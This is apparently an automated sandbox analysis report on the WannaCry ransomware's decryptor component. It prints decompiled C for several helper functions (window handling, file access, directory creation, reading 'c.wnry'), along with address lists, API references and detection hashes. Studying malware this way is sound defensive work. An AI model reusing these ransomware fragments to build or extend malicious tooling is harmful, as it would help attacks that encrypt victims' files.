                                                      0x0040bbbd
                                                      0x0040bbc0
                                                      0x0040bbc4
                                                      0x0040bbc8
                                                      0x0040bbcc
                                                      0x0040bbd8
                                                      0x0040bbdd
                                                      0x0040bbde
                                                      0x0040bbe3
                                                      0x0040bbfb
                                                      0x0040bc03
                                                      0x0040bc0a
                                                      0x0040bc0e
                                                      0x0040bc16
                                                      0x0040bc16
                                                      0x0040bc27
                                                      0x0040bc29
                                                      0x0040bc2c
                                                      0x0040bbbb
                                                      0x0040bc3a
                                                      0x0040bc3e
                                                      0x0040bc3f
                                                      0x0040bc7e
                                                      0x0040bc85
                                                      0x0040bc86
                                                      0x0040bc8b
                                                      0x0040bc90
                                                      0x00000000
                                                      0x0040bc92
                                                      0x0040bc9c
                                                      0x0040bc9e
                                                      0x0040bca8
                                                      0x0040bcb0
                                                      0x0040bcb3
                                                      0x0040bcb3
                                                      0x0040bcb7
                                                      0x0040bcc5
                                                      0x0040bcc5
                                                      0x0040bcd3
                                                      0x0040bcdc
                                                      0x0040bcdd
                                                      0x0040bce2
                                                      0x0040bce5
                                                      0x0040bce5
                                                      0x0040bc41
                                                      0x0040bc41
                                                      0x0040bc48
                                                      0x0040bc4d
                                                      0x0040bc4d
                                                      0x0040bc51
                                                      0x0040bc55
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc59
                                                      0x0040bc71
                                                      0x0040bc71
                                                      0x0040bc5b
                                                      0x0040bc5b
                                                      0x0040bc5b
                                                      0x0040bc61
                                                      0x0040bc65
                                                      0x00000000
                                                      0x0040bc67
                                                      0x0040bc67
                                                      0x0040bc6a
                                                      0x0040bc6f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc6f
                                                      0x0040bc65
                                                      0x0040bc7a
                                                      0x0040bc7a
                                                      0x0040bc7c
                                                      0x0040bcec
                                                      0x0040bcf3
                                                      0x0040bcf8
                                                      0x0040bcfc
                                                      0x0040bcff
                                                      0x0040bd01
                                                      0x0040bdc7
                                                      0x0040bdcb
                                                      0x0040bde3
                                                      0x0040bdec
                                                      0x0040bded
                                                      0x0040bdf2
                                                      0x00000000
                                                      0x0040bd07
                                                      0x0040bd07
                                                      0x0040bd10
                                                      0x0040bd16
                                                      0x0040bd18
                                                      0x0040bd1a
                                                      0x0040bd1c
                                                      0x0040bd1e
                                                      0x0040bd1e
                                                      0x0040bd20
                                                      0x0040bd20
                                                      0x0040bd23
                                                      0x0040bd23
                                                      0x0040bd23
                                                      0x0040bd20
                                                      0x0040bd26
                                                      0x0040bd28
                                                      0x0040bd2a
                                                      0x0040bd2c
                                                      0x0040bd2c
                                                      0x0040bd2f
                                                      0x0040bd2f
                                                      0x0040bd2f
                                                      0x0040bd2c
                                                      0x0040bd32
                                                      0x0040bd35
                                                      0x0040bd35
                                                      0x0040bd38
                                                      0x0040bd3a
                                                      0x0040bd3c
                                                      0x0040bd3c
                                                      0x0040bd4c
                                                      0x0040bd4e
                                                      0x0040bd54
                                                      0x0040bd58
                                                      0x0040bd62
                                                      0x0040bd62
                                                      0x0040bd64
                                                      0x0040bd68
                                                      0x0040bd69
                                                      0x0040bd6e
                                                      0x0040bd71
                                                      0x0040bd73
                                                      0x0040be1a
                                                      0x0040be25
                                                      0x0040be27
                                                      0x0040be2d
                                                      0x0040be34
                                                      0x0040be37
                                                      0x0040be3e
                                                      0x0040be3e
                                                      0x0040be40
                                                      0x0040be44
                                                      0x0040be46
                                                      0x0040be48
                                                      0x0040be4c
                                                      0x0040be4e
                                                      0x0040be52
                                                      0x0040be6a
                                                      0x0040be6f
                                                      0x0040be6f
                                                      0x0040be4e
                                                      0x0040be79
                                                      0x0040be7a
                                                      0x0040be7f
                                                      0x0040be82
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bd79
                                                      0x0040bd79
                                                      0x0040bd81
                                                      0x0040bd8c
                                                      0x0040bd94
                                                      0x0040bd96
                                                      0x0040bd99
                                                      0x0040bd9e
                                                      0x0040bd9f
                                                      0x0040bda8
                                                      0x0040bdb1
                                                      0x0040bdb5
                                                      0x0040bdbb
                                                      0x0040bdbf
                                                      0x0040bdbf
                                                      0x00000000
                                                      0x0040bd07
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc7c
                                                      0x0040bc75
                                                      0x0040bc77
                                                      0x00000000
                                                      0x0040bc77
                                                      0x0040bb38
                                                      0x0040bb38
                                                      0x0040bb3d
                                                      0x0040bb42
                                                      0x0040bb47
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bb47
                                                      0x0040bb36
                                                      0x0040bdf8
                                                      0x0040be03
                                                      0x0040be10

                                                      APIs
                                                      • strtok.MSVCRT ref: 0040BBA9
                                                      • strtok.MSVCRT ref: 0040BC22
                                                      • #825.MFC42(?,?), ref: 0040BCDD
                                                      • GetTickCount.KERNEL32 ref: 0040BCEC
                                                      • srand.MSVCRT ref: 0040BCF3
                                                      • rand.MSVCRT ref: 0040BD09
                                                      • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                                      • Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                                      • #825.MFC42(?,?,?,?), ref: 0040BDED
                                                        • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                                      • #825.MFC42(?), ref: 0040BE7A
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$strtok$CountSleepTickrandsrand
                                                      • String ID:
                                                      • API String ID: 1749417438-0
                                                      • Opcode ID: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
                                                      • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                                      • Opcode Fuzzy Hash: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
                                                      • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004085C0 Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 504 4085c0-408652 #567 #341 GetSysColor * 4 KiUserCallbackDispatcher 505 408660-4086a6 #6140 504->505 506 408654-408658 504->506 506->505 507 40865a-40865e GetSysColor 506->507 507->505
                                                      C-Code - Quality: 83%
                                                      			E004085C0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				int _t33;
				intOrPtr _t50;
				long _t53;
				intOrPtr _t55;

				_push(0xffffffff);
				_push(E00413FF3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_t50 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x4157f0;
				_v4 = 0;
				L00412F74();
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(__ecx)) = 0x4161a4;
				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
				_t53 = GetSysColor(2);
				_v20 = _t53;
				_v24 = 0;
				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
				if(_t33 != 0 && _v24 != 0) {
					_t53 = GetSysColor(0x1b);
				}
				_push(0xffffffff);
				_push(2);
				L00412F50();
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
				 *((intOrPtr*)(_t50 + 0x68)) = 0;
				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
				 *((intOrPtr*)(_t50 + 0x54)) = 0;
				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
				 *[fs:0x0] = _v20;
				return _t50;
			}












                                                      0x004085c0
                                                      0x004085c2
                                                      0x004085cd
                                                      0x004085ce
                                                      0x004085db
                                                      0x004085de
                                                      0x004085e2
                                                      0x004085e7
                                                      0x004085f2
                                                      0x004085f6
                                                      0x00408601
                                                      0x00408604
                                                      0x00408607
                                                      0x0040860a
                                                      0x00408612
                                                      0x00408617
                                                      0x00408621
                                                      0x00408628
                                                      0x0040862f
                                                      0x00408634
                                                      0x00408642
                                                      0x00408646
                                                      0x0040864a
                                                      0x00408652
                                                      0x0040865e
                                                      0x0040865e
                                                      0x00408660
                                                      0x00408662
                                                      0x00408667
                                                      0x00408674
                                                      0x0040867d
                                                      0x00408680
                                                      0x00408687
                                                      0x0040868a
                                                      0x00408691
                                                      0x00408694
                                                      0x0040869c
                                                      0x004086a6

                                                      APIs
                                                      • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                      • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                      • GetSysColor.USER32 ref: 0040861D
                                                      • GetSysColor.USER32(00000009), ref: 00408624
                                                      • GetSysColor.USER32(00000012), ref: 0040862B
                                                      • GetSysColor.USER32(00000002), ref: 00408632
                                                      • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                      • GetSysColor.USER32(0000001B), ref: 0040865C
                                                      • #6140.MFC42(00000002,000000FF), ref: 00408667
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Color$#341#567#6140CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2603677082-0
                                                      • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                                      • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B620 Relevance: 13.5, APIs: 9, Instructions: 45windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 100%
                                                      			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
				struct HWND__* _t4;
				struct HWND__* _t15;

				_t4 = FindWindowW(0, _a4); // executed
				_t15 = _t4;
				if(_t15 != 0) {
					ShowWindow(_t15, 5);
					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
					SetForegroundWindow(_t15);
					SetFocus(_t15);
					SetActiveWindow(_t15);
					BringWindowToTop(_t15);
					_t4 = _a8;
					if(_t4 != 0) {
						ExitProcess(0);
					}
				}
				return _t4;
			}





                                                      0x0040b628
                                                      0x0040b62e
                                                      0x0040b632
                                                      0x0040b638
                                                      0x0040b651
                                                      0x0040b660
                                                      0x0040b663
                                                      0x0040b66a
                                                      0x0040b671
                                                      0x0040b678
                                                      0x0040b67e
                                                      0x0040b685
                                                      0x0040b689
                                                      0x0040b689
                                                      0x0040b685
                                                      0x0040b690

                                                      APIs
                                                      • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                      • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                      • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                      • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                      • SetForegroundWindow.USER32(00000000), ref: 0040B663
                                                      • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                      • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                      • BringWindowToTop.USER32(00000000), ref: 0040B678
                                                      • ExitProcess.KERNEL32 ref: 0040B689
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
                                                      • String ID:
                                                      • API String ID: 962039509-0
                                                      • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                                      • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fclose$fopenfreadfwrite
                                                      • String ID: c.wnry
                                                      • API String ID: 2140422903-3240288721
                                                      • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                                      • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				char _v520;
				void _v816;
				struct _SECURITY_ATTRIBUTES* _v820;
				void* _t15;
				struct _SECURITY_ATTRIBUTES* _t37;
				CHAR* _t38;
				void* _t39;
				CHAR* _t40;
				struct _SECURITY_ATTRIBUTES** _t42;
				struct _SECURITY_ATTRIBUTES** _t44;

				_t40 = _a4;
				CreateDirectoryA(_t40, 0); // executed
				_t38 = _a8;
				_t15 = E00412920(_t38, _a12);
				_t28 = _t15;
				_t42 =  &(( &_v820)[2]);
				if(_t15 != 0) {
					_v820 = 0;
					memset( &_v816, 0, 0x4a << 2);
					E00412940(_t28, 0xffffffff,  &_v820);
					_t37 = _v820;
					_t44 =  &(_t42[6]);
					if(_t37 > 0) {
						_t39 = 0;
						if(_t37 > 0) {
							do {
								E00412940(_t28, _t39,  &_v820);
								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
								E004129E0(_t28, _t39,  &_v520);
								_t44 =  &(_t44[0xa]);
								_t39 = _t39 + 1;
							} while (_t39 < _t37);
						}
						E00412A00(_t28);
						return 1;
					} else {
						return 0;
					}
				} else {
					DeleteFileA(_t38);
					return 0;
				}
			}













                                                      0x0040b6a8
                                                      0x0040b6b4
                                                      0x0040b6c1
                                                      0x0040b6ca
                                                      0x0040b6cf
                                                      0x0040b6d1
                                                      0x0040b6d6
                                                      0x0040b6f7
                                                      0x0040b6ff
                                                      0x0040b709
                                                      0x0040b70e
                                                      0x0040b712
                                                      0x0040b717
                                                      0x0040b726
                                                      0x0040b72a
                                                      0x0040b72c
                                                      0x0040b733
                                                      0x0040b74e
                                                      0x0040b75d
                                                      0x0040b762
                                                      0x0040b765
                                                      0x0040b766
                                                      0x0040b72c
                                                      0x0040b76b
                                                      0x0040b77f
                                                      0x0040b71c
                                                      0x0040b725
                                                      0x0040b725
                                                      0x0040b6d8
                                                      0x0040b6d9
                                                      0x0040b6eb
                                                      0x0040b6eb

                                                      APIs
                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateDeleteDirectoryFile
                                                      • String ID: %s\%s
                                                      • API String ID: 3195586388-4073750446
                                                      • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                                      • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004108A0 Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
				long _t28;
				long _t30;
				void* _t34;
				signed int _t38;
				void* _t44;
				long* _t45;
				long _t46;
				char _t47;

				_t47 = _a12;
				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
					_t45 = _a16;
					_t44 = 0;
					_t38 = 0;
					 *_t45 = 0;
					_a12 = 0;
					if(_t47 == 1) {
						_t44 = _a4;
						_a12 = 0;
						goto L10;
					} else {
						if(_t47 != 2) {
							L11:
							_push(0x20);
							L00412CEC();
							_t46 = _t28;
							if(_t47 == 1 || _t47 == 2) {
								 *_t46 = 1;
								 *((char*)(_t46 + 0x10)) = _a12;
								 *(_t46 + 1) = _t38;
								 *(_t46 + 4) = _t44;
								 *((char*)(_t46 + 8)) = 0;
								 *(_t46 + 0xc) = 0;
								if(_t38 != 0) {
									_t30 = SetFilePointer(_t44, 0, 0, 1); // executed
									 *(_t46 + 0xc) = _t30;
								}
								 *_a16 = 0;
								return _t46;
							} else {
								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
								 *_t46 = 0;
								 *(_t46 + 1) = 1;
								 *((char*)(_t46 + 0x10)) = 0;
								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
								 *(_t46 + 0xc) = 0;
								 *_a16 = 0;
								return _t46;
							}
						} else {
							_t34 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
							_t44 = _t34;
							if(_t44 != 0xffffffff) {
								_a12 = 1;
								L10:
								_t28 = SetFilePointer(_t44, 0, 0, 1); // executed
								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
								goto L11;
							} else {
								 *_t45 = 0x200;
								return 0;
							}
						}
					}
				} else {
					 *_a16 = 0x10000;
					return 0;
				}
			}











                                                      0x004108a2
                                                      0x004108ab
                                                      0x004108c8
                                                      0x004108cc
                                                      0x004108ce
                                                      0x004108d3
                                                      0x004108d9
                                                      0x004108dd
                                                      0x00410915
                                                      0x00410919
                                                      0x00000000
                                                      0x004108df
                                                      0x004108e2
                                                      0x00410938
                                                      0x00410938
                                                      0x0041093a
                                                      0x00410945
                                                      0x00410947
                                                      0x00410980
                                                      0x00410985
                                                      0x00410988
                                                      0x0041098b
                                                      0x0041098e
                                                      0x00410992
                                                      0x00410999
                                                      0x004109a2
                                                      0x004109a8
                                                      0x004109a8
                                                      0x004109b4
                                                      0x004109bb
                                                      0x0041094e
                                                      0x00410956
                                                      0x0041095d
                                                      0x00410962
                                                      0x00410965
                                                      0x00410969
                                                      0x0041096d
                                                      0x00410970
                                                      0x00410973
                                                      0x0041097b
                                                      0x0041097b
                                                      0x004108e4
                                                      0x004108fb
                                                      0x00410901
                                                      0x00410906
                                                      0x00410920
                                                      0x00410925
                                                      0x0041092c
                                                      0x00410935
                                                      0x00000000
                                                      0x00410908
                                                      0x00410908
                                                      0x00410914
                                                      0x00410914
                                                      0x00410906
                                                      0x004108e2
                                                      0x004108b7
                                                      0x004108be
                                                      0x004108c7
                                                      0x004108c7

                                                      APIs
                                                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                                      • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Pointer$#823Create
                                                      • String ID:
                                                      • API String ID: 3407337251-0
                                                      • Opcode ID: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
                                                      • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                                      • Opcode Fuzzy Hash: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
                                                      • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412250 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00412250(CHAR* _a4, void* _a8) {
				void _v260;
				char _v520;
				long _t16;
				void* _t17;
				int _t22;
				void* _t29;
				CHAR* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				void* _t56;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				char* _t88;
				char* _t93;

				_t88 =  &_v520;
				_t32 = _a4;
				if(_t32 != 0) {
					_t16 = GetFileAttributesA(_t32); // executed
					if(_t16 == 0xffffffff) {
						_t16 = CreateDirectoryA(_t32, 0);
					}
				}
				_t87 = _a8;
				_t34 =  *_t87;
				if(_t34 == 0) {
					L15:
					return _t16;
				} else {
					_t17 = _t87;
					_t56 = _t87;
					do {
						if(_t34 == 0x2f || _t34 == 0x5c) {
							_t17 = _t56;
						}
						_t34 =  *(_t56 + 1);
						_t56 = _t56 + 1;
					} while (_t34 != 0);
					if(_t17 != _t87) {
						_t86 = _t87;
						_t51 = _t17 - _t87;
						_t52 = _t51 >> 2;
						memcpy( &_v260, _t86, _t52 << 2);
						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
						_t93 =  &(_t88[0x18]);
						_t34 = 0;
						_t93[_t29 + 0x114] = 0;
						E00412250(_t32,  &_v260);
						_t88 =  &(_t93[8]);
					}
					_v520 = 0;
					if(_t32 != 0) {
						asm("repne scasb");
						_t46 =  !(_t34 | 0xffffffff);
						_t85 = _t32 - _t46;
						_t47 = _t46 >> 2;
						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
						_t88 =  &(_t88[0x18]);
						_t34 = 0;
					}
					asm("repne scasb");
					_t36 =  !(_t34 | 0xffffffff);
					_t83 = _t87 - _t36;
					_t33 = _t36;
					asm("repne scasb");
					_t39 = _t33 >> 2;
					memcpy( &_v520 - 1, _t83, _t39 << 2);
					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
					_t16 = GetFileAttributesA( &_v520); // executed
					if(_t16 != 0xffffffff) {
						goto L15;
					} else {
						_t22 = CreateDirectoryA( &_v520, 0); // executed
						return _t22;
					}
				}
			}

























                                                      0x00412250
                                                      0x00412257
                                                      0x00412261
                                                      0x00412264
                                                      0x0041226d
                                                      0x00412272
                                                      0x00412272
                                                      0x0041226d
                                                      0x00412278
                                                      0x0041227f
                                                      0x00412284
                                                      0x0041235a
                                                      0x0041235a
                                                      0x0041228a
                                                      0x0041228a
                                                      0x0041228c
                                                      0x0041228e
                                                      0x00412291
                                                      0x00412298
                                                      0x00412298
                                                      0x0041229a
                                                      0x0041229d
                                                      0x0041229e
                                                      0x004122a6
                                                      0x004122aa
                                                      0x004122ac
                                                      0x004122b7
                                                      0x004122ba
                                                      0x004122c1
                                                      0x004122c1
                                                      0x004122c1
                                                      0x004122c3
                                                      0x004122d4
                                                      0x004122d9
                                                      0x004122d9
                                                      0x004122de
                                                      0x004122e3
                                                      0x004122f0
                                                      0x004122f2
                                                      0x004122f8
                                                      0x004122fc
                                                      0x00412306
                                                      0x00412306
